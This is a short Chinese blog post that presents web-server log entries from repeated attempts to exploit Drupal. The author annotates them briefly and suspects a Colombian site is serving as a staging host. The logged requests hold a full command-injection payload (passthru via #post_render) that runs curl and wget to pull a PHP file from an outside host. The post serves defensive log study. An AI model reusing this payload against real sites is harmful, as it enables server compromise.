2018年7月13日 星期五

從 Web Log 學習系統漏洞 16

一個哥倫比亞不知什麼組織的網站被當成跳板吧, 試圖抓(下載)東西到我主機

//?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=curl https://www.ccpalmira.org.co/bakso.php | wget https://www.ccpalmira.org.co/bakso.php


162.214.7.197 - - [13/Jul/2018:16:20:44 +0800] "POST /&sa=U&ved=0ahUKEwjzxa-60pvcAhXsylQKHTVdB4UQFggWMAA&usg=AOvVaw3vsrj2aMdyKh7AYGDJ4AQ4//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 318 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:20:45 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 209 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:20:48 +0800] "POST /&sa=U&ved=0ahUKEwjzxa-60pvcAhXsylQKHTVdB4UQwW4IOTAG&usg=AOvVaw1-3pvpkx_M-chWfTYVk9rR//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:20:49 +0800] "POST /&sa=U&ved=0ahUKEwjzxa-60pvcAhXsylQKHTVdB4UQwW4IOzAH&usg=AOvVaw3Yu7sIe8GfwAFsgwPp_Sla//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:20:49 +0800] "POST /&sa=U&ved=0ahUKEwjzxa-60pvcAhXsylQKHTVdB4UQwW4IPTAI&usg=AOvVaw2ULmUvRCK1tHscYHoz4vLk//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:22:00 +0800] "POST /&sa=U&ved=0ahUKEwjUm4O80pvcAhWQCDQIHRZOBkkQFgghMAI&usg=AOvVaw0XCZTpXtebX5dYlWRxnXhq//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 318 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:22:00 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 209 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:22:01 +0800] "POST /&sa=U&ved=0ahUKEwjUm4O80pvcAhWQCDQIHRZOBkkQwW4IMjAF&usg=AOvVaw00Ipoh0A5jD1qsn-VdOZsY//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:22:02 +0800] "POST /&sa=U&ved=0ahUKEwjUm4O80pvcAhWQCDQIHRZOBkkQwW4INDAG&usg=AOvVaw1w_e8zZSbKAF9GghiBplV1//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"
162.214.7.197 - - [13/Jul/2018:16:22:02 +0800] "POST /&sa=U&ved=0ahUKEwjUm4O80pvcAhWQCDQIHRZOBkkQwW4INjAH&usg=AOvVaw2UHtmzbWIl2swpy2O7utOf//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20https://www.ccpalmira.org.co/bakso.php%20%7C%20wget%20https://www.ccpalmira.org.co/bakso.php HTTP/1.1" 403 319 "-" "libwww-perl/6.15"

沒有留言:

張貼留言